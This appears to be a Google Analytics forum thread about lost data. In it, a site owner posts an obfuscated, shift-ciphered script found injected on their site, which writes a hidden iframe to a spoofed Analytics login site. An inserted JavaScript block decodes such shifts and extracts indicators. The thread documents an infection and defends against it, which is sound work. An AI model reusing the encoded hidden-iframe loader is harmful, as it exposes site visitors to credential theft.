"...regarding the issue of visits and e-commerce hits being dropped in Analytics, the official explanation that I got from our Analytics team is that Google Analytics experienced a data processing error from April 30th to May 5th. Almost all of the data has been recovered and is currently being reprocessed."
back on topic: my rep has explained that the data restoration will be commencing tonight (I don't see anything yet) or tomorrow. The bad news: if it doesn't occur by Friday 5/16 then I'm out of luck and the data is not retrievable.
Hi exposure & all,
My sincerest apologies for taking so long to get here; as you can imagine, it's been quite a week for us here in Analytics!
exposure, we are still in the process of restoring data, and expect it to be completed by EOD tomorrow, 5/16. I will, of course, keep this thread updated as I receive more updates.
GAA
I'm not sure if this is related but recently my website was labeled as hosting badware. I have always run a clean site and have advertised using the Google Adwords program for several years. Google would only tell me that they see a malicious code on our site, one that I had trouble identifying.
Then yesterday morning I found a code which I thought looked suspect. It was written in a cypher and originally I thought it was just part of the programming behind the site. After looking at the string of code in more detail I realized that it was a cypher, in fact an easy one in which to decode.
Here is the original code:
="=tdsjqu?!wbs!Tus>#33(!xjeui>2!ifjhiu>2!tuzmf>(wjtjcjmjuz;!ijeefo(?=0jg
sbnf?=jgsbnf!tsd>(iuuq;00mfpijo/dpn0ejbnpoe0j0joefy/qiq@pvu>33#..epdvnfo
u/xsjuf)Tus/tvctusjoh)68-226*-Tus/tvctusjoh)1-68**!=0tdsjqu?";
And here is what I translated it to:
script – var – str – width – height – style – visibility – hidden – I – frame – I – frame – iframe – src – [leohin.com.diamond.i.index...] - document - write – str – substring – 68-226 – str – substring – 1-68 – script
Here's where it gets interesting.
If you were to go to leohin.com you would see that it was a spoofed Google Analytics site. Google as of last night has been working at getting that site taken down; however, from what I can discern it has been up for about three months. I have a screenshot of the spoofed Analytics site. It appears it would ask for a user's login information and then capture that information before sending the person through to the Google Analytics site.
I don't know if these issues are resolved; however, they very well may be. It is also possible that other Google Analytics accounts have been breached like ours may have been.
It is ironic that Google flagged our account as providing malicious code and would not assist us other than verify that the code was still on the site and then it turns out that the code led back to a spoofed Google Analytics site. I've yet to hear much back regarding this but it seems interesting that I received notification of data loss on the analytics side during the same time this other issue was going on.
I've asked Google if there has been a security breach and will update this thread once I receive a response.
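The cipher in the post above moves every character up by one code point. As an added example (not code from this thread), the sketch below undoes such a shift for triage, generalised to try small shifts in both directions and keep the one that yields recognisable markup, then reports any embedded hosts in defanged form. The function names and the marker list are assumptions made for illustration.

```javascript
// Input: the obfuscated string as posted in the thread, with the three
// wrapped lines joined and the outer ="..." wrapper removed.
const SAMPLE =
  '=tdsjqu?!wbs!Tus>#33(!xjeui>2!ifjhiu>2!tuzmf>(wjtjcjmjuz;!ijeefo(?=0jg' +
  'sbnf?=jgsbnf!tsd>(iuuq;00mfpijo/dpn0ejbnpoe0j0joefy/qiq@pvu>33#..epdvnfo' +
  'u/xsjuf)Tus/tvctusjoh)68-226*-Tus/tvctusjoh)1-68**!=0tdsjqu?';

// Substrings expected in injected markup once it is decoded correctly (assumed list).
const MARKERS = ['<script', '</script', '<iframe', 'document.write', 'http://', 'visibility'];

// Undo a fixed character-code shift (the post's cipher corresponds to shift = 1).
function shiftDecode(text, shift) {
  return Array.from(text, ch => String.fromCharCode(ch.charCodeAt(0) - shift)).join('');
}

// Try each small shift and keep the one whose output contains the most markers.
// A score of 0 means no shift produced recognisable markup.
function findShift(text, maxShift = 8) {
  let best = { shift: 0, score: 0, decoded: text };
  for (let shift = -maxShift; shift <= maxShift; shift++) {
    const decoded = shiftDecode(text, shift);
    const lower = decoded.toLowerCase();
    const score = MARKERS.filter(m => lower.includes(m)).length;
    if (score > best.score) best = { shift, score, decoded };
  }
  return best;
}

// Pull out what a responder needs: remote hosts, defanged URLs for the
// ticket, and whether the markup hides an iframe from the visitor.
function extractIndicators(decoded) {
  const urls = decoded.match(/https?:\/\/[^\s'"<>]+/gi) || [];
  return {
    hosts: [...new Set(urls.map(u => new URL(u).hostname))],
    defanged: urls.map(u => u.replace(/^http/i, 'hxxp').replace(/\./g, '[.]')),
    hiddenIframe: /<iframe/i.test(decoded) && /visibility:\s*hidden/i.test(decoded),
  };
}

const result = findShift(SAMPLE);
console.log('shift:', result.shift, 'markers matched:', result.score);
console.log(extractIndicators(result.decoded));
```

The same scoring loop can be run over every string literal found in a site's templates and script files, flagging any literal that only becomes markup after a shift.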
Hi mcmunsta,
I recall your email; it was escalated to me and my team earlier this week.
Our teams are still evaluating the scope of the breach, but there seems to be a lot at work here. From experience, I strongly recommend looking into a forensic analysis to find the breach on your machine.
Feel free to PM me with questions, and I'd be happy to chat outside the context of this thread :)
GAA